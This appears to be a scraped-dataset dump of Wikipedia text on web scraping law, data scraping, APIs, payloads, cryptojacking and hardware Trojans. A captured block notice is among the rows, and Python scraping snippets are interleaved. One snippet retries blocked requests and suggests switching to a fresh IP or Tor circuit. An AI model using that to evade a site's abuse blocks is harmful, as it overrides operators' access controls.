collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court.
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
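The regular-expression and DOM/XPath extraction approaches described in the row above can be sketched in a few lines of Python. This is a minimal, hedged illustration rather than part of the pipeline output: the URL is an arbitrary placeholder and the lxml package is assumed to be installed.

import re
import requests
from lxml import html  # assumed to be installed (pip install lxml)

URL = "https://example.com/"  # placeholder page, not one of the scraped rows

page = requests.get(URL, timeout=10).text

# 1) grep/regex style: pull dollar amounts straight out of the raw HTML.
prices = re.findall(r"\$\d+(?:\.\d{2})?", page)

# 2) DOM style: parse the page into a tree and query it with XPath.
tree = html.fromstring(page)
links = tree.xpath("//a/@href")        # every hyperlink target on the page
headings = tree.xpath("//h1//text()")  # text of the top-level headings

print("regex matches:", prices[:5])
print("first links:", links[:5])
print("headings:", headings)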
429 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_ref-2 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today, for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50-year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24x80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX/VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined, in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner.
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
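Report mining, as described at the end of the row above, works on static, human-readable report files rather than on a live connection to the source system. A minimal sketch of the idea, with a made-up fixed-width report standing in for a captured spool file (the column names and values are hypothetical):

from io import StringIO
import pandas as pd

# Hypothetical spool-file content: a fixed-width report a legacy system might print.
report = StringIO(
    "CUST_ID  NAME             BALANCE\n"
    "10001    Alice Example     120.50\n"
    "10002    Bob Example        75.00\n"
)

# pandas infers the fixed-width column boundaries and returns structured rows.
df = pd.read_fwf(report)
print(df)
print("total balance:", df["BALANCE"].sum())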
430 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-18 | (Same Web scraping article text as row 428; the duplicate content is omitted here.) |
431 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Payload_(computing) | In computing and telecommunications, the payload is the part of transmitted data that is the actual intended message. Headers and metadata are sent only to enable payload delivery 1 2 and are considered overhead. In the context of a computer virus or worm, the payload is the portion of the malware which performs malicious action. The term is borrowed from transportation, where payload refers to the part of the load that pays for transportation. In computer networking, the data to be transmitted is the payload. It is almost always encapsulated in some type of frame format, composed of framing bits and a frame check sequence. 3 4 Examples are Ethernet frames, Point-to-Point Protocol (PPP) frames, Fibre Channel frames, and V.42 modem frames. In computer programming, the most common usage of the term is in the context of message protocols, to differentiate the protocol overhead from the actual data. For example, in a JSON web service response, the string Hello, world might be the payload of the JSON message, while the rest of the response is protocol overhead. In computer security, the payload is the part of the private user text which could also contain malware such as worms or viruses, which performs the malicious action, such as deleting data, sending spam or encrypting data. 5 In addition to the payload, such malware also typically has overhead code aimed at simply spreading itself, or avoiding detection. |
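The payload/overhead distinction in the row above can be made concrete with a small example. The JSON body below is illustrative only (the sample response from the original article is not reproduced in the scraped text); the headers exist only to deliver the message, while the "Hello, world" string is the payload.

import json

# A hypothetical HTTP response, split into protocol overhead and payload.
body = '{"status": "OK", "data": {"message": "Hello, world"}}'
headers = {
    "Content-Type": "application/json",
    "Content-Length": str(len(body)),
}

payload = json.loads(body)["data"]["message"]
print("payload:", payload)     # Hello, world
print("overhead:", headers)    # everything sent only to enable delivery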
432 | https://en.wikipedia.org/wiki/Web_scraping | https://fa.wikipedia.org/wiki/%D9%88%D8%A8_%D8%A7%D8%B3%DA%A9%D8%B1%D9%BE%DB%8C%D9%86%DA%AF | (Persian-language copy of the Web scraping article; the non-Latin text did not survive the character filtering, leaving only scattered Latin acronyms and punctuation, so no readable content remains in this row.) |
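Row 432 shows what happens when a Latin-only character filter is applied to a page written in another script: the article text disappears entirely. The snippet below is a generic illustration of that effect and of a Unicode-aware alternative; the patterns are simplified stand-ins, not the exact filter used for this dataset.

import re

sample = "Web scraping (وب اسکرپینگ) extracts data from HTML pages."

# Latin-only filter: anything outside basic ASCII letters, digits and punctuation is dropped.
latin_only = re.sub(r"[^A-Za-z0-9\s.,;:()?'\"-]+", " ", sample)

# Unicode-aware filter: \w keeps word characters from any script.
unicode_aware = re.sub(r"[^\w\s.,;:()?'\"-]+", " ", sample)

print(latin_only)      # the Persian phrase is stripped out
print(unicode_aware)   # the Persian phrase survives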
433 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Special:UrlShortener&url=https%3A%2F%2Fen.wikipedia.org%2Fwiki%2FWeb_scraping | The IP address or range 180.190.0.0/16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place an unblock request on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0/16 has been globally blocked for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards@wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Main Page. |
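Row 433 is not article text at all: the request to the URL shortener came back as a Wikipedia block notice for the scraper's IP range. A scraping pipeline can check for this kind of response before trying to parse it. The sketch below is a generic illustration; the status codes and marker phrases are assumptions for demonstration, not Wikipedia's documented behaviour.

import time
import requests

BLOCK_MARKERS = ("has been blocked", "globally blocked")  # phrases seen in block notices

def fetch_with_block_check(url, retries=3, backoff=30):
    """Fetch a page, treating HTTP 403/429 or a block notice in the body as a failure."""
    for attempt in range(retries):
        resp = requests.get(url, timeout=10)
        blocked = resp.status_code in (403, 429) or any(
            marker in resp.text for marker in BLOCK_MARKERS
        )
        if not blocked:
            return resp.text
        # Back off (or switch to a fresh IP / Tor circuit) before retrying.
        time.sleep(backoff * (attempt + 1))
    raise RuntimeError(f"Still blocked after {retries} attempts: {url}")

# Example (placeholder URL):
# page = fetch_with_block_check("https://example.org/some-page")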
434 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/API | An application programming interface (API) is a way for two or more computer programs or components to communicate with each other. It is a type of software interface, offering a service to other pieces of software. 1 A document or standard that describes how to build or use such a connection or interface is called an API specification. A computer system that meets this standard is said to implement or expose an API. The term API may refer either to the specification or to the implementation. Whereas a system's user interface dictates how its end-users interact with the system in question, its API dictates how to write code that takes advantage of that system's capabilities. In contrast to a user interface, which connects a computer to a person, an application programming interface connects computers or pieces of software to each other. It is not intended to be used directly by a person (the end user) other than a computer programmer who is incorporating it into the software. An API is often made up of different parts which act as tools or services that are available to the programmer. A program or a programmer that uses one of these parts is said to call that portion of the API. The calls that make up the API are also known as subroutines, methods, requests, or endpoints. An API specification defines these calls, meaning that it explains how to use or implement them. One purpose of APIs is to hide the internal details of how a system works, exposing only those parts that a programmer will find useful, and keeping them consistent even if the internal details change later. An API may be custom-built for a particular pair of systems, or it may be a shared standard allowing interoperability among many systems. There are APIs for programming languages, software libraries, computer operating systems, and computer hardware. APIs originated in the 1940s, though the term did not emerge until the 1960s and 1970s. Contemporary usage of the term API often refers to web APIs, 2 which allow communication between computers that are joined by the internet. Recent developments in APIs have led to the rise in popularity of microservices, which are loosely coupled services accessed through public APIs. 3 APIs should be versioned. There are two common versioning strategies. 4 In building applications, an API simplifies programming by abstracting the underlying implementation and only exposing objects or actions the developer needs. While a graphical interface for an email client might provide a user with a button that performs all the steps for fetching and highlighting new emails, an API for file input/output might give the developer a function that copies a file from one location to another without requiring that the developer understand the file system operations occurring behind the scenes. 5 The term API initially described an interface only for end-user-facing programs, known as application programs. This origin is still reflected in the name "application programming interface." Today, the term is broader, including also utility software and even hardware interfaces. 7 The idea of the API is much older than the term itself. British computer scientists Maurice Wilkes and David Wheeler worked on a modular software library in the 1940s for EDSAC, an early computer. The subroutines in this library were stored on punched paper tape organized in a filing cabinet.
This cabinet also contained what Wilkes and Wheeler called a "library catalog" of notes about each subroutine and how to incorporate it into a program. Today, such a catalog would be called an API (or an API specification or API documentation) because it instructs a programmer on how to use (or "call") each subroutine that the programmer needs. 7 Wilkes and Wheeler's 1951 book The Preparation of Programs for an Electronic Digital Computer contains the first published API specification. Joshua Bloch considers that Wilkes and Wheeler "latently invented" the API because it is more of a concept that is discovered than invented. 7 The term "application program interface" (without an -ing suffix) is first recorded in a paper called Data structures and techniques for remote computer graphics presented at an AFIPS conference in 1968. 9 7 The authors of this paper use the term to describe the interaction of an application—a graphics program in this case—with the rest of the computer system. A consistent application interface (consisting of Fortran subroutine calls) was intended to free the programmer from dealing with idiosyncrasies of the graphics display device, and to provide hardware independence if the computer or the display were replaced. 8 The term was introduced to the field of databases by C. J. Date 10 in a 1974 paper called The Relational and Network Approaches: Comparison of the Application Programming Interface. 11 An API became a part of the ANSI/SPARC framework for database management systems. This framework treated the application programming interface separately from other interfaces, such as the query interface. Database professionals in the 1970s observed these different interfaces could be combined; a sufficiently rich application interface could support the other interfaces as well. 6 This observation led to APIs that supported all types of programming, not just application programming. By 1990, the API was defined simply as "a set of services available to a programmer for performing certain tasks" by technologist Carl Malamud. 12 The idea of the API was expanded again with the dawn of remote procedure calls and web APIs. As computer networks became common in the 1970s and 1980s, programmers wanted to call libraries located not only on their local computers but on computers located elsewhere. These remote procedure calls were well supported by the Java language in particular. In the 1990s, with the spread of the internet, standards like CORBA, COM, and DCOM competed to become the most common way to expose API services. 13 Roy Fielding's dissertation Architectural Styles and the Design of Network-based Software Architectures at UC Irvine in 2000 outlined Representational state transfer (REST) and described the idea of a "network-based Application Programming Interface" that Fielding contrasted with traditional "library-based" APIs. 14 XML and JSON web APIs saw widespread commercial adoption beginning in 2000 and continuing as of 2022. The web API is now the most common meaning of the term API. 2 The Semantic Web proposed by Tim Berners-Lee in 2001 included "semantic APIs" that recast the API as an open, distributed data interface rather than a software behavior interface. 15 Proprietary interfaces and agents became more widespread than open ones, but the idea of the API as a data interface took hold. Because web APIs are widely used to exchange data of all kinds online, API has become a broad term describing much of the communication on the internet.
13 When used in this way, the term API has overlap in meaning with the term communication protocol. The interface to a software library is one type of API. The API describes and prescribes the "expected behavior" (a specification) while the library is an "actual implementation" of this set of rules. A single API can have multiple implementations (or none, being abstract) in the form of different libraries that share the same programming interface. The separation of the API from its implementation can allow programs written in one language to use a library written in another. For example, because Scala and Java compile to compatible bytecode, Scala developers can take advantage of any Java API. 16 API use can vary depending on the type of programming language involved. An API for a procedural language such as Lua could consist primarily of basic routines to execute code, manipulate data or handle errors while an API for an object-oriented language, such as Java, would provide a specification of classes and their class methods. 17 18 Hyrum's law states that "With a sufficient number of users of an API, it does not matter what you promise in the contract: all observable behaviors of your system will be depended on by somebody." 19 Meanwhile, several studies show that most applications that use an API tend to use a small part of the API. 20 Language bindings are also APIs. By mapping the features and capabilities of one language to an interface implemented in another language, a language binding allows a library or service written in one language to be used when developing in another language. Tools such as SWIG and F2PY, a Fortran-to-Python interface generator, facilitate the creation of such interfaces. 21 An API can also be related to a software framework: a framework can be based on several libraries implementing several APIs, but unlike the normal use of an API, the access to the behavior built into the framework is mediated by extending its content with new classes plugged into the framework itself. Moreover, the overall program flow of control can be out of the control of the caller and in the framework's hands by inversion of control or a similar mechanism. 22 23 An API can specify the interface between an application and the operating system. 24 POSIX, for example, provides a set of common API specifications that aim to enable an application written for a POSIX conformant operating system to be compiled for another POSIX conformant operating system. Linux and Berkeley Software Distribution are examples of operating systems that implement the POSIX APIs. 25 Microsoft has shown a strong commitment to a backward-compatible API, particularly within its Windows API (Win32) library, so older applications may run on newer versions of Windows using an executable-specific setting called "Compatibility Mode". 26 An API differs from an application binary interface (ABI) in that an API is source code based while an ABI is binary based. For instance, POSIX provides APIs while the Linux Standard Base provides an ABI. 27 28 Remote APIs allow developers to manipulate remote resources through protocols, specific standards for communication that allow different technologies to work together, regardless of language or platform.
For example, the Java Database Connectivity API allows developers to query many different types of databases with the same set of functions, while the Java remote method invocation API uses the Java Remote Method Protocol to allow invocation of functions that operate remotely but appear local to the developer. 29 30 Therefore, remote APIs are useful in maintaining the object abstraction in object-oriented programming; a method call, executed locally on a proxy object, invokes the corresponding method on the remote object, using the remoting protocol, and acquires the result to be used locally as a return value. A modification of the proxy object will also result in a corresponding modification of the remote object. 31 Web APIs are a service accessed from client devices (mobile phones, laptops, etc.) to a web server using the Hypertext Transfer Protocol (HTTP). Client devices send a request in the form of an HTTP request, and are met with a response message usually in JavaScript Object Notation (JSON) or Extensible Markup Language (XML) format. Developers typically use Web APIs to query a server for a specific set of data from that server. An example might be a shipping company API that can be added to an eCommerce-focused website to facilitate ordering shipping services and automatically include current shipping rates, without the site developer having to enter the shipper's rate table into a web database. While "web API" historically has been virtually synonymous with web service, the recent trend (so-called Web 2.0) has been moving away from Simple Object Access Protocol (SOAP) based web services and service-oriented architecture (SOA) towards more direct representational state transfer (REST) style web resources and resource-oriented architecture (ROA). 32 Part of this trend is related to the Semantic Web movement toward Resource Description Framework (RDF), a concept to promote web-based ontology engineering technologies. Web APIs allow the combination of multiple APIs into new applications known as mashups. 33 In the social media space, web APIs have allowed web communities to facilitate sharing content and data between communities and applications. In this way, content that is created in one place dynamically can be posted and updated to multiple locations on the web. 34 For example, Twitter's REST API allows developers to access core Twitter data and the Search API provides methods for developers to interact with Twitter Search and trends data. 35 The design of an API has a significant impact on its usage. 5 First of all, the design of programming interfaces represents an important part of software architecture, the organization of a complex piece of software. 36 The principle of information hiding describes the role of programming interfaces as enabling modular programming by hiding the implementation details of the modules so that users of modules need not understand the complexities inside the modules. 37 Aside from the previous underlying principle, other metrics for measuring the usability of an API may include properties such as functional efficiency, overall correctness, and learnability for novices. 38 One straightforward and commonly adopted way of designing APIs is to follow Nielsen's heuristic evaluation guidelines. The Factory method pattern is also typical in designing APIs due to their reusable nature. 39 Thus, the design of an API attempts to provide only the tools a user would expect. 5 An application programming interface can be synchronous or asynchronous. 
A synchronous API call is a design pattern where the call site is blocked while waiting for the called code to finish. 40 With an asynchronous API call, however, the call site is not blocked while waiting for the called code to finish, and instead the calling thread is notified when the reply arrives. API security is very critical when developing a public facing API. Common threats include SQL injection, Denial-of-service attack (DoS), broken authentication, and exposing sensitive data. 41 Without ensuring proper security practices, bad actors can get access to information they should not have or even gain privileges to make changes to your server. Some common security practices include proper connection security using HTTPS, content security to mitigate data injection attacks, and requiring an API key to use your service. 42 Many public facing API services require you to use an assigned API key, and will refuse to serve data without sending the key with your request. 43 APIs are one of the more common ways technology companies integrate. Those that provide and use APIs are considered as being members of a business ecosystem. 44 The main policies for releasing an API are: 45 An important factor when an API becomes public is its "interface stability". Changes to the API—for example adding new parameters to a function call—could break compatibility with the clients that depend on that API. 49 When parts of a publicly presented API are subject to change and thus not stable, such parts of a particular API should be documented explicitly as "unstable". For example, in the Google Guava library, the parts that are considered unstable, and that might change soon, are marked with the Java annotation Beta. 50 A public API can sometimes declare parts of itself as deprecated or rescinded. This usually means that part of the API should be considered a candidate for being removed, or modified in a backward incompatible way. Therefore, these changes allow developers to transition away from parts of the API that will be removed or not supported in the future. 51 On February 19, 2020, Akamai published their annual "State of the Internet" report, showcasing the growing trend of cybercriminals targeting public API platforms at financial services worldwide. From December 2017 through November 2019, Akamai witnessed 85.42 billion credential violation attacks. About 20%, or 16.55 billion, were against hostnames defined as API endpoints. Of these, 473.5 million have targeted financial services sector organizations. 52 API documentation describes the services an API offers and how to use those services, aiming to cover everything a client would need to know for practical purposes. Documentation is crucial for the development and maintenance of applications using the API. 53 API documentation is traditionally found in documentation files but can also be found in social media such as blogs, forums, and Q A websites. 54 Traditional documentation files are often presented via a documentation system, such as Javadoc or Pydoc, that has a consistent appearance and structure. However, the types of content included in the documentation differ from API to API. 55 In the interest of clarity, API documentation may include a description of classes and methods in the API as well as "typical usage scenarios, code snippets, design rationales, performance discussions, and contracts", but implementation details of the API services themselves are usually omitted. 
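The synchronous/asynchronous distinction and the API-key requirement mentioned above can both be illustrated with the standard library plus requests. The endpoint URL and the X-API-Key header name are assumptions chosen for illustration, since real providers each define their own.

from concurrent.futures import ThreadPoolExecutor
import requests

API_KEY = "YOUR-KEY-HERE"                  # many public APIs refuse requests without a key
URL = "https://api.example.com/v1/data"    # placeholder endpoint, served over HTTPS
HEADERS = {"X-API-Key": API_KEY}           # header name varies by provider

def fetch_sync():
    # Synchronous call: the call site blocks until the reply arrives.
    return requests.get(URL, headers=HEADERS, timeout=10).status_code

def fetch_async(executor):
    # Asynchronous pattern: the calling thread is notified via a callback
    # when the reply arrives, instead of blocking at the call site.
    future = executor.submit(requests.get, URL, headers=HEADERS, timeout=10)
    future.add_done_callback(lambda f: print("reply arrived:", f.result().status_code))
    return future   # the caller is free to do other work in the meantime

# Example usage against a real endpoint:
# with ThreadPoolExecutor(max_workers=1) as pool:
#     fetch_async(pool)
#     print("status:", fetch_sync())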
Reference documentation for a REST API can be generated automatically from an OpenAPI document, which is a machine-readable text file that uses a prescribed format and syntax defined in the OpenAPI Specification. The OpenAPI document defines basic information such as the API's name and description, as well as describing operations the API provides access to. 56 API documentation can be enriched with metadata information like Java annotations. This metadata can be used by the compiler, tools, and by the run-time environment to implement custom behaviors or custom handling. 57 In 2010, Oracle Corporation sued Google for having distributed a new implementation of Java embedded in the Android operating system. 58 Google had not acquired any permission to reproduce the Java API, although permission had been given to the similar OpenJDK project. Google had approached Oracle to negotiate a license for their API, but were turned down due to trust issues. Despite the disagreement, Google chose to use Oracle's code anyway. Judge William Alsup ruled in the Oracle v. Google case that APIs cannot be copyrighted in the U.S and that a victory for Oracle would have widely expanded copyright protection to a "functional set of symbols" and allowed the copyrighting of simple software commands: To accept Oracle's claim would be to allow anyone to copyright one version of code to carry out a system of commands and thereby bar all others from writing its different versions to carry out all or part of the same commands. 59 60 Alsup's ruling was overturned in 2014 on appeal to the Court of Appeals for the Federal Circuit, though the question of whether such use of APIs constitutes fair use was left unresolved. 61 62 In 2016, following a two-week trial, a jury determined that Google's reimplementation of the Java API constituted fair use, but Oracle vowed to appeal the decision. 63 Oracle won on its appeal, with the Court of Appeals for the Federal Circuit ruling that Google's use of the APIs did not qualify for fair use. 64 In 2019, Google appealed to the Supreme Court of the United States over both the copyrightability and fair use rulings, and the Supreme Court granted review. 65 Due to the COVID 19 pandemic, the oral hearings in the case were delayed until October 2020. 66 The case was decided by the Supreme Court in Google's favor with a ruling of 6 2. Justice Stephen Breyer delivered the opinion of the court and at one point mentioned that "The declaring code is, if copyrightable at all, further than are most computer programs from the core of copyright. This means the code used in APIs are more similar to dictionaries than novels in terms of copyright protection. 67 |
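Returning to the OpenAPI documentation point at the start of this entry, the sketch below assembles a deliberately minimal OpenAPI 3.0 document as a Python dictionary and serializes it to JSON. The API title, path, and descriptions are invented; a real document would enumerate every operation, parameter, and schema.

import json

openapi_doc = {
    "openapi": "3.0.3",
    "info": {
        "title": "Example Rates API",
        "version": "1.0.0",
        "description": "Hypothetical API used only to illustrate the document format.",
    },
    "paths": {
        "/rates": {
            "get": {
                "summary": "Return a shipping rate",
                "responses": {"200": {"description": "A JSON object with a rate field"}},
            }
        }
    },
}

# Reference-documentation generators consume a machine-readable file like this one.
print(json.dumps(openapi_doc, indent=2))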
435 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Cryptojacking | Cryptojacking is the act of exploiting a computer to mine cryptocurrencies, often through websites, 1 2 3 against the user's will or while the user is unaware. 4 One notable piece of software used for cryptojacking was Coinhive, which was used in over two-thirds of cryptojacks before its March 2019 shutdown. 5 The cryptocurrencies mined the most often are privacy coins—coins with hidden transaction histories—such as Monero and Zcash. 2 6 Like most malicious attacks on the computing public, the motive is profit, but unlike other threats, it is designed to remain completely hidden from the user. Cryptojacking malware can lead to slowdowns and crashes due to straining of computational resources. 7 Bitcoin mining by personal computers infected with malware is being challenged by dedicated hardware, such as FPGA and ASIC platforms, which are more efficient in terms of power consumption and thus may have lower costs than theft of computing resources. 8 In June 2011, Symantec warned about the possibility that botnets could mine covertly for bitcoins. 9 Malware used the parallel processing capabilities of GPUs built into many modern video cards. 10 Although the average PC with an integrated graphics processor is virtually useless for bitcoin mining, tens of thousands of PCs laden with mining malware could produce some results. 11 In mid-August 2011, bitcoin mining botnets were detected, 12 13 14 and less than three months later, bitcoin mining trojans had infected Mac OS X. 15 In April 2013, electronic sports organization E-Sports Entertainment was accused of hijacking 14,000 computers to mine bitcoins; the company later settled the case with the State of New Jersey. 16 German police arrested two people in December 2013 who customized existing botnet software to perform bitcoin mining, which police said had been used to mine at least $950,000 worth of bitcoins. 17 For four days in December 2013 and January 2014, Yahoo Europe hosted an ad containing bitcoin mining malware that infected an estimated two million computers using a Java vulnerability. 18 19 Another software, called Sefnit, was first detected in mid 2013 and has been bundled with many software packages. Microsoft has been removing the malware through its Microsoft Security Essentials and other security software. 20 Several reports of employees or students using university or research computers to mine bitcoins have been published. 21 On February 20, 2014, a member of the Harvard community was stripped of his or her access to the university's research computing facilities after setting up a Dogecoin mining operation using a Harvard research network, according to an internal email circulated by Faculty of Arts and Sciences Research Computing officials. 22 Ars Technica reported in January 2018 that YouTube advertisements contained JavaScript code that mined the cryptocurrency Monero. 23 In 2021, multiple zero-day vulnerabilities were found on Microsoft Exchange servers, allowing remote code execution. These vulnerabilities were exploited to mine cryptocurrency. 24 Traditional countermeasures of cryptojacking are host-based and not suitable for corporate networks. A potential solution is a network-based approach called Crypto-Aegis, which uses machine learning to detect cryptocurrency activities in network traffic, even when encrypted or mixed with non-malicious data. 25 |
437 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Hardware_Trojan | A Hardware Trojan (HT) is a malicious modification of the circuitry of an integrated circuit. A hardware Trojan is completely characterized by its physical representation and its behavior. The payload of an HT is the entire activity that the Trojan executes when it is triggered. In general, Trojans try to bypass or disable the security fence of a system: for example, leaking confidential information by radio emission. HTs also could disable, damage or destroy the entire chip or components of it. Hardware Trojans may be introduced as hidden "Front-doors" that are inserted while designing a computer chip, by using a pre-made application-specific integrated circuit (ASIC) semiconductor intellectual property core (IP Core) that have been purchased from a non-reputable source, or inserted internally by a rogue employee, either acting on their own, or on behalf of rogue special interest groups, or state sponsored spying and espionage. 1 One paper published by IEEE in 2015 explains how a hardware design containing a Trojan could leak a cryptographic key leaked over an antenna or network connection, provided that the correct "easter egg" trigger is applied to activate the data leak. 2 In high security governmental IT departments, hardware Trojans are a well known problem when buying hardware such as: a KVM switch, keyboards, mice, network cards, or other network equipment. This is especially the case when purchasing such equipment from non-reputable sources that could have placed hardware Trojans to leak keyboard passwords, or provide remote unauthorized entry. 3 In a diverse global economy, outsourcing of production tasks is a common way to lower a product's cost. Embedded hardware devices are not always produced by the firms that design and or sell them, nor in the same country where they will be used. Outsourced manufacturing can raise doubt about the evidence for the integrity of the manufactured product (i.e., one's certainty that the end-product has no design modifications compared to its original design). Anyone with access to the manufacturing process could, in theory, introduce some change to the final product. For complex products, small changes with large effects can be difficult to detect. The threat of a 